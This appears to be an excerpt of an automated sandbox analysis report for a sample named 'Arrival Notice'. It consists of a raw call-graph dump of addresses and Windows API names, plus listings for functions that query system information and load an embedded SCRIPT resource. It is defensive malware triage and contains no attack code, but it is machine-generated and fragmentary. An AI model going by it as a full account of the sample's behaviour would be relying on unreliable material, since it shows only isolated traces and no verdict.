97083->97054 97084->97072 97085->97072 97086->97072 97087->97076 97088->97072 97089 3d03fb 97090 3d0407 __FrameHandler3::FrameUnwindToState 97089->97090 97118 3cfeb1 97090->97118 97092 3d040e 97093 3d0561 97092->97093 97096 3d0438 97092->97096 97145 3d083f IsProcessorFeaturePresent IsDebuggerPresent SetUnhandledExceptionFilter UnhandledExceptionFilter ___scrt_fastfail 97093->97145 97095 3d0568 97146 3d4e52 28 API calls _abort 97095->97146 97107 3d0477 ___scrt_is_nonwritable_in_current_image ___scrt_release_startup_lock 97096->97107 97129 3e247d 97096->97129 97098 3d056e 97147 3d4e04 28 API calls _abort 97098->97147 97102 3d0576 97103 3d0457 97105 3d04d8 97137 3d0959 97105->97137 97107->97105 97141 3d4e1a 38 API calls 3 library calls 97107->97141 97109 3d04de 97110 3d04f3 97109->97110 97142 3d0992 GetModuleHandleW 97110->97142 97112 3d04fa 97112->97095 97114 3d04fe 97112->97114 97113 3d0507 97144 3d0040 13 API calls 2 library calls 97113->97144 97114->97113 97143 3d4df5 28 API calls _abort 97114->97143 97117 3d050f 97117->97103 97119 3cfeba 97118->97119 97148 3d0698 IsProcessorFeaturePresent 97119->97148 97121 3cfec6 97149 3d2c94 10 API calls 3 library calls 97121->97149 97123 3cfecb 97128 3cfecf 97123->97128 97150 3e2317 IsProcessorFeaturePresent SetUnhandledExceptionFilter UnhandledExceptionFilter GetCurrentProcess TerminateProcess 97123->97150 97125 3cfed8 97126 3cfee6 97125->97126 97151 3d2cbd 8 API calls 3 library calls 97125->97151 97126->97092 97128->97092 97132 3e2494 97129->97132 97131 3d0451 97131->97103 97133 3e2421 97131->97133 97152 3d0a8c 97132->97152 97136 3e2450 97133->97136 97134 3d0a8c __ehhandler$?ConvertBSTRToString@_com_util@@YGPADPAG@Z 5 API calls 97135 3e2479 97134->97135 97135->97107 97136->97134 97160 3d2340 97137->97160 97140 3d097f 97140->97109 97141->97105 97142->97112 97143->97113 97144->97117 97145->97095 97146->97098 97147->97102 97148->97121 97149->97123 97150->97125 97151->97128 97153 3d0a95 97152->97153 97154 3d0a97 IsProcessorFeaturePresent 97152->97154 97153->97131 97156 3d0c5d 97154->97156 97159 3d0c21 SetUnhandledExceptionFilter UnhandledExceptionFilter GetCurrentProcess TerminateProcess 97156->97159 97158 3d0d40 97158->97131 97159->97158 97161 3d096c GetStartupInfoW 97160->97161 97161->97140 97162 3b1033 97167 3b4c91 97162->97167 97166 3b1042 97168 3ba961 22 API calls 97167->97168 97169 3b4cff 97168->97169 97175 3b3af0 97169->97175 97171 3b4d9c 97173 3b1038 97171->97173 97178 3b51f7 22 API calls __fread_nolock 97171->97178 97174 3d00a3 29 API calls __onexit 97173->97174 97174->97166 97179 3b3b1c 97175->97179 97178->97171 97180 3b3b0f 97179->97180 97181 3b3b29 97179->97181 97180->97171 97181->97180 97182 3b3b30 RegOpenKeyExW 97181->97182 97182->97180 97183 3b3b4a RegQueryValueExW 97182->97183 97184 3b3b6b 97183->97184 97185 3b3b80 RegCloseKey 97183->97185 97184->97185 97185->97180 97186 3bdf10 97189 3bb710 97186->97189 97190 3bb72b 97189->97190 97191 400146 97190->97191 97192 4000f8 97190->97192 97204 3bb750 97190->97204 97231 4358a2 239 API calls 2 library calls 97191->97231 97196 400102 97192->97196 97199 40010f 97192->97199 97192->97204 97194 3bba20 97207 3bba4e 97194->97207 97235 42359c 82 API calls __wsopen_s 97194->97235 97229 435d33 239 API calls 97196->97229 97199->97194 97230 4361d0 239 API calls 2 library calls 97199->97230 97202 4003d9 97202->97202 97204->97194 97204->97207 97208 400322 97204->97208 97215 3cd336 40 API calls 97204->97215 97216 3bbbe0 40 API calls 97204->97216 97217 3bec40 239 API calls 97204->97217 97218 3ba8c7 22 API calls 97204->97218 97220 3ba81b 41 API calls 97204->97220 97221 3cd2f0 40 API calls 97204->97221 97222 3ca01b 239 API calls 97204->97222 97223 3d0242 5 API calls __Init_thread_wait 97204->97223 97224 3cedcd 22 API calls 97204->97224 97225 3d00a3 29 API calls __onexit 97204->97225 97226 3d01f8 EnterCriticalSection LeaveCriticalSection SetEvent ResetEvent 97204->97226 97227 3cee53 82 API calls 97204->97227 97228 3ce5ca 239 API calls 97204->97228 97232 3baceb 23 API calls ISource 97204->97232 97233 40f6bf 23 API calls 97204->97233 97234 435c0c 82 API calls 97208->97234 97215->97204 97216->97204 97217->97204 97218->97204 97220->97204 97221->97204 97222->97204 97223->97204 97224->97204 97225->97204 97226->97204 97227->97204 97228->97204 97229->97199 97230->97194 97231->97204 97232->97204 97233->97204 97234->97194 97235->97202 97236 3b2e37 97237 3ba961 22 API calls 97236->97237 97238 3b2e4d 97237->97238 97315 3b4ae3 97238->97315 97240 3b2e6b 97241 3b3a5a 24 API calls 97240->97241 97242 3b2e7f 97241->97242 97243 3b9cb3 22 API calls 97242->97243 97244 3b2e8c 97243->97244 97245 3b4ecb 94 API calls 97244->97245 97246 3b2ea5 97245->97246 97247 3b2ead 97246->97247 97248 3f2cb0 97246->97248 97251 3ba8c7 22 API calls 97247->97251 97345 422cf9 97248->97345 97250 3f2cc3 97252 3f2ccf 97250->97252 97254 3b4f39 68 API calls 97250->97254 97253 3b2ec3 97251->97253 97256 3b4f39 68 API calls 97252->97256 97329 3b6f88 22 API calls 97253->97329 97254->97252 97258 3f2ce5 97256->97258 97257 3b2ecf 97259 3b9cb3 22 API calls 97257->97259 97371 3b3084 22 API calls 97258->97371 97260 3b2edc 97259->97260 97330 3ba81b 41 API calls 97260->97330 97263 3b2eec 97265 3b9cb3 22 API calls 97263->97265 97264 3f2d02 97372 3b3084 22 API calls 97264->97372 97267 3b2f12 97265->97267 97331 3ba81b 41 API calls 97267->97331 97269 3f2d1e 97271 3b3a5a 24 API calls 97269->97271 97270 3b2f21 97274 3ba961 22 API calls 97270->97274 97272 3f2d44 97271->97272 97373 3b3084 22 API calls 97272->97373 97277 3b2f3f 97274->97277 97275 3f2d50 97276 3ba8c7 22 API calls 97275->97276 97278 3f2d5e 97276->97278 97332 3b3084 22 API calls 97277->97332 97374 3b3084 22 API calls 97278->97374 97281 3b2f4b 97333 3d4a28 40 API calls 3 library calls 97281->97333 97282 3f2d6d 97286 3ba8c7 22 API calls 97282->97286 97284 3b2f59 97284->97258 97285 3b2f63 97284->97285 97334 3d4a28 40 API calls 3 library calls 97285->97334 97288 3f2d83 97286->97288 97375 3b3084 22 API calls 97288->97375 97289 3b2f6e 97289->97264 97291 3b2f78 97289->97291 97335 3d4a28 40 API calls 3 library calls 97291->97335 97292 3f2d90 97294 3b2f83 97294->97269 97295 3b2f8d 97294->97295 97336 3d4a28 40 API calls 3 library calls 97295->97336 97297 3b2f98 97298 3b2fdc 97297->97298 97337 3b3084 22 API calls 97297->97337 97298->97282 97299 3b2fe8 97298->97299 97299->97292 97339 3b63eb 22 API calls 97299->97339 97301 3b2fbf 97303 3ba8c7 22 API calls 97301->97303 97306 3b2fcd 97303->97306 97304 3b2ff8 97340 3b6a50 22 API calls 97304->97340 97338 3b3084 22 API calls 97306->97338 97307 3b3006 97341 3b70b0 23 API calls 97307->97341 97312 3b3021 97313 3b3065 97312->97313 97342 3b6f88 22 API calls 97312->97342 97343 3b70b0 23 API calls 97312->97343 97344 3b3084 22 API calls 97312->97344 97316 3b4af0 __wsopen_s 97315->97316 97317 3b6b57 22 API calls 97316->97317 97318 3b4b22 97316->97318 97317->97318 97319 3b4c6d 22 API calls 97318->97319 97328 3b4b58 97318->97328 97319->97318 97320 3b4c6d 22 API calls 97320->97328 97321 3b9cb3 22 API calls 97323 3b4c52 97321->97323 97322 3b9cb3 22 API calls 97322->97328 97324 3b515f 22 API calls 97323->97324 97326 3b4c5e 97324->97326 97325 3b515f 22 API calls 97325->97328 97326->97240 97327 3b4c29 97327->97321 97327->97326 97328->97320 97328->97322 97328->97325 97328->97327 97329->97257 97330->97263 97331->97270 97332->97281 97333->97284 97334->97289 97335->97294 97336->97297 97337->97301 97338->97298 97339->97304 97340->97307 97341->97312 97342->97312 97343->97312 97344->97312 97346 422d15 97345->97346 97347 3b511f 64 API calls 97346->97347 97348 422d29 97347->97348 97349 422e66 75 API calls 97348->97349 97350 422d3b 97349->97350 97351 3b50f5 40 API calls 97350->97351 97369 422d3f 97350->97369 97352 422d56 97351->97352 97353 3b50f5 40 API calls 97352->97353 97354 422d66 97353->97354 97355 3b50f5 40 API calls 97354->97355 97356 422d81 97355->97356 97357 3b50f5 40 API calls 97356->97357 97358 422d9c 97357->97358 97359 3b511f 64 API calls 97358->97359 97360 422db3 97359->97360 97361 3dea0c ___std_exception_copy 21 API calls 97360->97361 97362 422dba 97361->97362 97363 3dea0c ___std_exception_copy 21 API calls 97362->97363 97364 422dc4 97363->97364 97365 3b50f5 40 API calls 97364->97365 97366 422dd8 97365->97366 97367 4228fe 27 API calls 97366->97367 97368 422dee 97367->97368 97368->97369 97370 4222ce 79 API calls 97368->97370 97369->97250 97370->97369 97371->97264 97372->97269 97373->97275 97374->97282 97375->97292 97376 3b3156 97379 3b3170 97376->97379 97380 3b3187 97379->97380 97381 3b31eb 97380->97381 97382 3b318c 97380->97382 97383 3b31e9 97380->97383 97387 3f2dfb 97381->97387 97388 3b31f1 97381->97388 97384 3b3199 97382->97384 97385 3b3265 PostQuitMessage 97382->97385 97386 3b31d0 DefWindowProcW 97383->97386 97390 3f2e7c 97384->97390 97391 3b31a4 97384->97391 97392 3b316a 97385->97392 97386->97392 97428 3b18e2 10 API calls 97387->97428 97393 3b31f8 97388->97393 97394 3b321d SetTimer RegisterWindowMessageW 97388->97394 97443 41bf30 34 API calls ___scrt_fastfail 97390->97443 97396 3b31ae 97391->97396 97397 3f2e68 97391->97397 97400 3f2d9c 97393->97400 97401 3b3201 KillTimer 97393->97401 97394->97392 97398 3b3246 CreatePopupMenu 97394->97398 97395 3f2e1c 97429 3ce499 42 API calls 97395->97429 97404 3f2e4d 97396->97404 97405 3b31b9 97396->97405 97442 41c161 27 API calls ___scrt_fastfail 97397->97442 97398->97392 97407 3f2dd7 MoveWindow 97400->97407 97408 3f2da1 97400->97408 97424 3b30f2 Shell_NotifyIconW ___scrt_fastfail 97401->97424 97404->97386 97441 410ad7 22 API calls 97404->97441 97411 3b31c4 97405->97411 97412 3b3253 97405->97412 97406 3f2e8e 97406->97386 97406->97392 97407->97392 97413 3f2da7 97408->97413 97414 3f2dc6 SetFocus 97408->97414 97410 3b3263 97410->97392 97411->97386 97430 3b30f2 Shell_NotifyIconW ___scrt_fastfail 97411->97430 97426 3b326f 44 API calls ___scrt_fastfail 97412->97426 97413->97411 97418 3f2db0 97413->97418 97414->97392 97415 3b3214 97425 3b3c50 DeleteObject DestroyWindow 97415->97425 97427 3b18e2 10 API calls 97418->97427 97422 3f2e41 97431 3b3837 97422->97431 97424->97415 97425->97392 97426->97410 97427->97392 97428->97395 97429->97411 97430->97422 97432 3b3862 ___scrt_fastfail 97431->97432 97444 3b4212 97432->97444 97436 3f3386 Shell_NotifyIconW 97437 3b3906 Shell_NotifyIconW 97448 3b3923 97437->97448 97438 3b38e8 97438->97436 97438->97437 97440 3b391c 97440->97383 97441->97383 97442->97410 97443->97406 97445 3f35a4 97444->97445 97446 3b38b7 97444->97446 97445->97446 97447 3f35ad DestroyIcon 97445->97447 97446->97438 97470 41c874 42 API calls _strftime 97446->97470 97447->97446 97449 3b393f 97448->97449 97450 3b3a13 97448->97450 97451 3b6270 22 API calls 97449->97451 97450->97440 97452 3b394d 97451->97452 97453 3b395a 97452->97453 97454 3f3393 LoadStringW 97452->97454 97455 3b6b57 22 API calls 97453->97455 97456 3f33ad 97454->97456 97457 3b396f 97455->97457 97460 3ba8c7 22 API calls 97456->97460 97464 3b3994 ___scrt_fastfail 97456->97464 97458 3f33c9 97457->97458 97459 3b397c 97457->97459 97462 3b6350 22 API calls 97458->97462 97459->97456 97461 3b3986 97459->97461 97460->97464 97463 3b6350 22 API calls 97461->97463 97465 3f33d7 97462->97465 97463->97464 97467 3b39f9 Shell_NotifyIconW 97464->97467 97465->97464 97466 3b33c6 22 API calls 97465->97466 97468 3f33f9 97466->97468 97467->97450 97469 3b33c6 22 API calls 97468->97469 97469->97464 97470->97438 97471 403f75 97482 3cceb1 97471->97482 97473 403f8b 97474 404006 97473->97474 97491 3ce300 23 API calls 97473->97491 97476 3bbf40 239 API calls 97474->97476 97479 404052 97476->97479 97477 403fe6 97477->97479 97492 421abf 22 API calls 97477->97492 97480 404a88 97479->97480 97493 42359c 82 API calls __wsopen_s 97479->97493 97483 3ccebf 97482->97483 97484 3cced2 97482->97484 97494 3baceb 23 API calls ISource 97483->97494 97485 3ccf05 97484->97485 97486 3cced7 97484->97486 97495 3baceb 23 API calls ISource 97485->97495 97488 3cfddb 22 API calls 97486->97488 97490 3ccec9 97488->97490 97490->97473 97491->97477 97492->97474 97493->97480 97494->97490 97495->97490 97496 3b1cad SystemParametersInfoW 97497 3b2de3 97498 3b2df0 __wsopen_s 97497->97498 97499 3b2e09 97498->97499 97500 3f2c2b ___scrt_fastfail 97498->97500 97501 3b3aa2 23 API calls 97499->97501 97503 3f2c47 GetOpenFileNameW 97500->97503 97502 3b2e12 97501->97502 97513 3b2da5 97502->97513 97504 3f2c96 97503->97504 97506 3b6b57 22 API calls 97504->97506 97508 3f2cab 97506->97508 97508->97508 97510 3b2e27 97531 3b44a8 97510->97531 97514 3f1f50 __wsopen_s 97513->97514 97515 3b2db2 GetLongPathNameW 97514->97515 97516 3b6b57 22 API calls 97515->97516 97517 3b2dda 97516->97517 97518 3b3598 97517->97518 97519 3ba961 22 API calls 97518->97519 97520 3b35aa 97519->97520 97521 3b3aa2 23 API calls 97520->97521 97522 3b35b5 97521->97522 97523 3f32eb 97522->97523 97524 3b35c0 97522->97524 97529 3f330d 97523->97529 97566 3cce60 41 API calls 97523->97566 97525 3b515f 22 API calls 97524->97525 97527 3b35cc 97525->97527 97560 3b35f3 97527->97560 97530 3b35df 97530->97510 97532 3b4ecb 94 API calls 97531->97532 97533 3b44cd 97532->97533 97534 3f3833 97533->97534 97535 3b4ecb 94 API calls 97533->97535 97536 422cf9 80 API calls 97534->97536 97537 3b44e1 97535->97537 97538 3f3848 97536->97538 97537->97534 97539 3b44e9 97537->97539 97540 3f384c 97538->97540 97541 3f3869 97538->97541 97543 3f3854 97539->97543 97544 3b44f5 97539->97544 97545 3b4f39 68 API calls 97540->97545 97542 3cfe0b 22 API calls 97541->97542 97556 3f38ae 97542->97556 97574 41da5a 82 API calls 97543->97574 97573 3b940c 136 API calls 2 library calls 97544->97573 97545->97543 97548 3f3862 97548->97541 97549 3b2e31 97550 3b4f39 68 API calls 97553 3f3a5f 97550->97553 97551 3ba4a1 22 API calls 97551->97556 97553->97550 97578 41989b 82 API calls __wsopen_s 97553->97578 97556->97551 97556->97553 97557 3b9cb3 22 API calls 97556->97557 97567 3b3ff7 97556->97567 97575 41967e 22 API calls __fread_nolock 97556->97575 97576 4195ad 42 API calls _wcslen 97556->97576 97577 420b5a 22 API calls 97556->97577 97557->97556 97561 3b3605 97560->97561 97565 3b3624 __fread_nolock 97560->97565 97563 3cfe0b 22 API calls 97561->97563 97562 3cfddb 22 API calls 97564 3b363b 97562->97564 97563->97565 97564->97530 97565->97562 97566->97523 97568 3b400a 97567->97568 97570 3b40ae 97567->97570 97569 3cfe0b 22 API calls 97568->97569 97571 3b403c 97568->97571 97569->97571 97570->97556 97571->97570 97572 3cfddb 22 API calls 97571->97572 97572->97571 97573->97549 97574->97548 97575->97556 97576->97556 97577->97556 97578->97553 97579 3f2ba5 97580 3f2baf 97579->97580 97581 3b2b25 97579->97581 97583 3b3a5a 24 API calls 97580->97583 97607 3b2b83 7 API calls 97581->97607 97585 3f2bb8 97583->97585 97587 3b9cb3 22 API calls 97585->97587 97589 3f2bc6 97587->97589 97588 3b2b2f 97594 3b3837 49 API calls 97588->97594 97595 3b2b44 97588->97595 97590 3f2bce 97589->97590 97591 3f2bf5 97589->97591 97592 3b33c6 22 API calls 97590->97592 97593 3b33c6 22 API calls 97591->97593 97596 3f2bd9 97592->97596 97597 3f2bf1 GetForegroundWindow ShellExecuteW 97593->97597 97594->97595 97600 3b2b5f 97595->97600 97611 3b30f2 Shell_NotifyIconW ___scrt_fastfail 97595->97611 97598 3b6350 22 API calls 97596->97598 97602 3f2c26 97597->97602 97601 3f2be7 97598->97601 97604 3b2b66 SetCurrentDirectoryW 97600->97604 97605 3b33c6 22 API calls 97601->97605 97602->97600 97606 3b2b7a 97604->97606 97605->97597 97612 3b2cd4 7 API calls 97607->97612 97609 3b2b2a 97610 3b2c63 CreateWindowExW CreateWindowExW ShowWindow ShowWindow 97609->97610 97610->97588 97611->97600 97612->97609 97613 3e8402 97618 3e81be 97613->97618 97616 3e842a 97623 3e81ef try_get_first_available_module 97618->97623 97620 3e83ee 97637 3e27ec 26 API calls __wsopen_s 97620->97637 97622 3e8343 97622->97616 97630 3f0984 97622->97630 97623->97623 97626 3e8338 97623->97626 97633 3d8e0b 40 API calls 2 library calls 97623->97633 97625 3e838c 97625->97626 97634 3d8e0b 40 API calls 2 library calls 97625->97634 97626->97622 97636 3df2d9 20 API calls __dosmaperr 97626->97636 97628 3e83ab 97628->97626 97635 3d8e0b 40 API calls 2 library calls 97628->97635 97638 3f0081 97630->97638 97632 3f099f 97632->97616 97633->97625 97634->97628 97635->97626 97636->97620 97637->97622 97639 3f008d __FrameHandler3::FrameUnwindToState 97638->97639 97640 3f009b 97639->97640 97643 3f00d4 97639->97643 97695 3df2d9 20 API calls __dosmaperr 97640->97695 97642 3f00a0 97696 3e27ec 26 API calls __wsopen_s 97642->97696 97649 3f065b 97643->97649 97648 3f00aa __wsopen_s 97648->97632 97650 3f0678 97649->97650 97651 3f068d 97650->97651 97652 3f06a6 97650->97652 97712 3df2c6 20 API calls __dosmaperr 97651->97712 97698 3e5221 97652->97698 97655 3f06ab 97656 3f06cb 97655->97656 97657 3f06b4 97655->97657 97711 3f039a CreateFileW 97656->97711 97714 3df2c6 20 API calls __dosmaperr 97657->97714 97661 3f06b9 97715 3df2d9 20 API calls __dosmaperr 97661->97715 97663 3f0704 97664 3f0781 GetFileType 97663->97664 97669 3f0756 GetLastError 97663->97669 97716 3f039a CreateFileW 97663->97716 97666 3f078c GetLastError 97664->97666 97667 3f07d3 97664->97667 97665 3f00f8 97697 3f0121 LeaveCriticalSection __wsopen_s 97665->97697 97718 3df2a3 20 API calls __dosmaperr 97666->97718 97720 3e516a 21 API calls 2 library calls 97667->97720 97668 3f0692 97713 3df2d9 20 API calls __dosmaperr 97668->97713 97717 3df2a3 20 API calls __dosmaperr 97669->97717 97672 3f079a CloseHandle 97672->97668 97674 3f07c3 97672->97674 97719 3df2d9 20 API calls __dosmaperr 97674->97719 97676 3f0749 97676->97664 97676->97669 97678 3f07f4 97680 3f0840 97678->97680 97721 3f05ab 72 API calls 3 library calls 97678->97721 97679 3f07c8 97679->97668 97684 3f086d 97680->97684 97722 3f014d 72 API calls 4 library calls 97680->97722 97683 3f0866 97683->97684 97685 3f087e 97683->97685 97686 3e86ae __wsopen_s 29 API calls 97684->97686 97685->97665 97687 3f08fc CloseHandle 97685->97687 97686->97665 97723 3f039a CreateFileW 97687->97723 97689 3f0927 97690 3f095d 97689->97690 97691 3f0931 GetLastError 97689->97691 97690->97665 97724 3df2a3 20 API calls __dosmaperr 97691->97724 97693 3f093d 97725 3e5333 21 API calls 2 library calls 97693->97725 97695->97642 97696->97648 97697->97648 97699 3e522d __FrameHandler3::FrameUnwindToState 97698->97699 97726 3e2f5e EnterCriticalSection 97699->97726 97701 3e5234 97703 3e5259 97701->97703 97707 3e52c7 EnterCriticalSection 97701->97707 97710 3e527b 97701->97710 97730 3e5000 21 API calls 3 library calls 97703->97730 97705 3e52a4 __wsopen_s 97705->97655 97706 3e525e 97706->97710 97731 3e5147 EnterCriticalSection 97706->97731 97709 3e52d4 LeaveCriticalSection 97707->97709 97707->97710 97709->97701 97727 3e532a 97710->97727 97711->97663 97712->97668 97713->97665 97714->97661 97715->97668 97716->97676 97717->97668 97718->97672 97719->97679 97720->97678 97721->97680 97722->97683 97723->97689 97724->97693 97725->97690 97726->97701 97732 3e2fa6 LeaveCriticalSection 97727->97732 97729 3e5331 97729->97705 97730->97706 97731->97710 97732->97729 97733 3b1044 97738 3b10f3 97733->97738 97735 3b104a 97774 3d00a3 29 API calls __onexit 97735->97774 97737 3b1054 97775 3b1398 97738->97775 97742 3b116a 97743 3ba961 22 API calls 97742->97743 97744 3b1174 97743->97744 97745 3ba961 22 API calls 97744->97745 97746 3b117e 97745->97746 97747 3ba961 22 API calls 97746->97747 97748 3b1188 97747->97748 97749 3ba961 22 API calls 97748->97749 97750 3b11c6 97749->97750 97751 3ba961 22 API calls 97750->97751 97752 3b1292 97751->97752 97785 3b171c 97752->97785 97756 3b12c4 97757 3ba961 22 API calls 97756->97757 97758 3b12ce 97757->97758 97759 3c1940 9 API calls 97758->97759 97760 3b12f9 97759->97760 97806 3b1aab 97760->97806 97762 3b1315 97763 3b1325 GetStdHandle 97762->97763 97764 3b137a 97763->97764 97765 3f2485 97763->97765 97768 3b1387 OleInitialize 97764->97768 97765->97764 97766 3f248e 97765->97766 97767 3cfddb 22 API calls 97766->97767 97769 3f2495 97767->97769 97768->97735 97813 42011d InitializeCriticalSectionAndSpinCount InterlockedExchange GetCurrentProcess GetCurrentProcess DuplicateHandle 97769->97813 97771 3f249e 97814 420944 CreateThread 97771->97814 97773 3f24aa CloseHandle 97773->97764 97774->97737 97815 3b13f1 97775->97815 97778 3b13f1 22 API calls 97779 3b13d0 97778->97779 97780 3ba961 22 API calls 97779->97780 97781 3b13dc 97780->97781 97782 3b6b57 22 API calls 97781->97782 97783 3b1129 97782->97783 97784 3b1bc3 6 API calls 97783->97784 97784->97742 97786 3ba961 22 API calls 97785->97786 97787 3b172c 97786->97787 97788 3ba961 22 API calls 97787->97788 97789 3b1734 97788->97789 97790 3ba961 22 API calls 97789->97790 97791 3b174f 97790->97791 97792 3cfddb 22 API calls 97791->97792 97793 3b129c 97792->97793 97794 3b1b4a 97793->97794 97795 3b1b58 97794->97795 97796 3ba961 22 API calls 97795->97796 97797 3b1b63 97796->97797 97798 3ba961 22 API calls 97797->97798 97799 3b1b6e 97798->97799 97800 3ba961 22 API calls 97799->97800 97801 3b1b79 97800->97801 97802 3ba961 22 API calls 97801->97802 97803 3b1b84 97802->97803 97804 3cfddb 22 API calls 97803->97804 97805 3b1b96 RegisterWindowMessageW 97804->97805 97805->97756 97807 3b1abb 97806->97807 97808 3f272d 97806->97808 97809 3cfddb 22 API calls 97807->97809 97822 423209 23 API calls 97808->97822 97811 3b1ac3 97809->97811 97811->97762 97812 3f2738 97813->97771 97814->97773 97823 42092a 28 API calls 97814->97823 97816 3ba961 22 API calls 97815->97816 97817 3b13fc 97816->97817 97818 3ba961 22 API calls 97817->97818 97819 3b1404 97818->97819 97820 3ba961 22 API calls 97819->97820 97821 3b13c6 97820->97821 97821->97778 97822->97812

                  Executed Functions

                  Function 003B42DE Relevance: 21.2, APIs: 9, Strings: 3, Instructions: 235libraryloaderCOMMON
                  Download Yara Rule

                  Control-flow Graph

                  • Executed
                  • Not Executed
                  control_flow_graph 234 3b42de-3b434d call 3ba961 GetVersionExW call 3b6b57 239 3f3617-3f362a 234->239 240 3b4353 234->240 242 3f362b-3f362f 239->242 241 3b4355-3b4357 240->241 245 3b435d-3b43bc call 3b93b2 call 3b37a0 241->245 246 3f3656 241->246 243 3f3632-3f363e 242->243 244 3f3631 242->244 243->242 247 3f3640-3f3642 243->247 244->243 263 3f37df-3f37e6 245->263 264 3b43c2-3b43c4 245->264 250 3f365d-3f3660 246->250 247->241 249 3f3648-3f364f 247->249 249->239 252 3f3651 249->252 253 3b441b-3b4435 GetCurrentProcess IsWow64Process 250->253 254 3f3666-3f36a8 250->254 252->246 256 3b4437 253->256 257 3b4494-3b449a 253->257 254->253 258 3f36ae-3f36b1 254->258 260 3b443d-3b4449 256->260 257->260 261 3f36db-3f36e5 258->261 262 3f36b3-3f36bd 258->262 265 3b444f-3b445e LoadLibraryA 260->265 266 3f3824-3f3828 GetSystemInfo 260->266 270 3f36f8-3f3702 261->270 271 3f36e7-3f36f3 261->271 267 3f36bf-3f36c5 262->267 268 3f36ca-3f36d6 262->268 272 3f37e8 263->272 273 3f3806-3f3809 263->273 264->250 269 3b43ca-3b43dd 264->269 279 3b449c-3b44a6 GetSystemInfo 265->279 280 3b4460-3b446e GetProcAddress 265->280 267->253 268->253 281 3b43e3-3b43e5 269->281 282 3f3726-3f372f 269->282 275 3f3715-3f3721 270->275 276 3f3704-3f3710 270->276 271->253 274 3f37ee 272->274 277 3f380b-3f381a 273->277 278 3f37f4-3f37fc 273->278 274->278 275->253 276->253 277->274 287 3f381c-3f3822 277->287 278->273 289 3b4476-3b4478 279->289 280->279 288 3b4470-3b4474 GetNativeSystemInfo 280->288 283 3b43eb-3b43ee 281->283 284 3f374d-3f3762 281->284 285 3f373c-3f3748 282->285 286 3f3731-3f3737 282->286 290 3f3791-3f3794 283->290 291 3b43f4-3b440f 283->291 292 3f376f-3f377b 284->292 293 3f3764-3f376a 284->293 285->253 286->253 287->278 288->289 294 3b447a-3b447b FreeLibrary 289->294 295 3b4481-3b4493 289->295 290->253 298 3f379a-3f37c1 290->298 296 3b4415 291->296 297 3f3780-3f378c 291->297 292->253 293->253 294->295 296->253 297->253 299 3f37ce-3f37da 298->299 300 3f37c3-3f37c9 298->300 299->253 300->253
                  APIs
                  • GetVersionExW.KERNEL32(?), ref: 003B430D
                    • Part of subcall function 003B6B57: _wcslen.LIBCMT ref: 003B6B6A
                  • GetCurrentProcess.KERNEL32(?,0044CB64,00000000,?,?), ref: 003B4422
                  • IsWow64Process.KERNEL32(00000000,?,?), ref: 003B4429
                  • LoadLibraryA.KERNEL32(kernel32.dll,?,?), ref: 003B4454
                  • GetProcAddress.KERNEL32(00000000,GetNativeSystemInfo), ref: 003B4466
                  • GetNativeSystemInfo.KERNELBASE(?,?,?), ref: 003B4474
                  • FreeLibrary.KERNEL32(00000000,?,?), ref: 003B447B
                  • GetSystemInfo.KERNEL32(?,?,?), ref: 003B44A0
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.1659920401.00000000003B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003B0000, based on PE: true
                  • Associated: 00000000.00000002.1659906452.00000000003B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1659965256.000000000044C000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1659965256.0000000000472000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1659999268.000000000047C000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1660012374.0000000000484000.00000002.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_3b0000_Arrival Notice.jbxd
                  Similarity
                  • API ID: InfoLibraryProcessSystem$AddressCurrentFreeLoadNativeProcVersionWow64_wcslen
                  • String ID: GetNativeSystemInfo$kernel32.dll$|O
                  • API String ID: 3290436268-3101561225
                  • Opcode ID: fb6afc86f10cd314af2438d0f3540c71f04a50cc95adc731235c8e0c21f6a10b
                  • Instruction ID: 5b2fc0e6cc5044b6aaa330fccfc1a6457252c896a7d5eb48b225613f71141f32
                  • Opcode Fuzzy Hash: fb6afc86f10cd314af2438d0f3540c71f04a50cc95adc731235c8e0c21f6a10b
                  • Instruction Fuzzy Hash: D7A1B17590A2C4DFE713C76A78805ED3FAC6B26704B084CBFD98193E32D260465ACB2D
                  Function 003B42A2 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 61COMMON
                  Download Yara Rule

                  Control-flow Graph

                  • Executed
                  • Not Executed
                  control_flow_graph 1378 3b42a2-3b42ba CreateStreamOnHGlobal 1379 3b42da-3b42dd 1378->1379 1380 3b42bc-3b42d3 FindResourceExW 1378->1380 1381 3b42d9 1380->1381 1382 3f35ba-3f35c9 LoadResource 1380->1382 1381->1379 1382->1381 1383 3f35cf-3f35dd SizeofResource 1382->1383 1383->1381 1384 3f35e3-3f35ee LockResource 1383->1384 1384->1381 1385 3f35f4-3f3612 1384->1385 1385->1381
                  APIs
                  • CreateStreamOnHGlobal.OLE32(00000000,00000001,?,?,?,?,?,003B50AA,?,?,00000000,00000000), ref: 003B42B2
                  • FindResourceExW.KERNEL32(?,0000000A,SCRIPT,00000000,?,?,003B50AA,?,?,00000000,00000000), ref: 003B42C9
                  • LoadResource.KERNEL32(?,00000000,?,?,003B50AA,?,?,00000000,00000000,?,?,?,?,?,?,003B4F20), ref: 003F35BE
                  • SizeofResource.KERNEL32(?,00000000,?,?,003B50AA,?,?,00000000,00000000,?,?,?,?,?,?,003B4F20), ref: 003F35D3
                  • LockResource.KERNEL32(003B50AA,?,?,003B50AA,?,?,00000000,00000000,?,?,?,?,?,?,003B4F20,?), ref: 003F35E6
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.1659920401.00000000003B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003B0000, based on PE: true
                  • Associated: 00000000.00000002.1659906452.00000000003B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1659965256.000000000044C000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1659965256.0000000000472000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1659999268.000000000047C000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1660012374.0000000000484000.00000002.00000001.01000000.00000003.sdmpDownload File
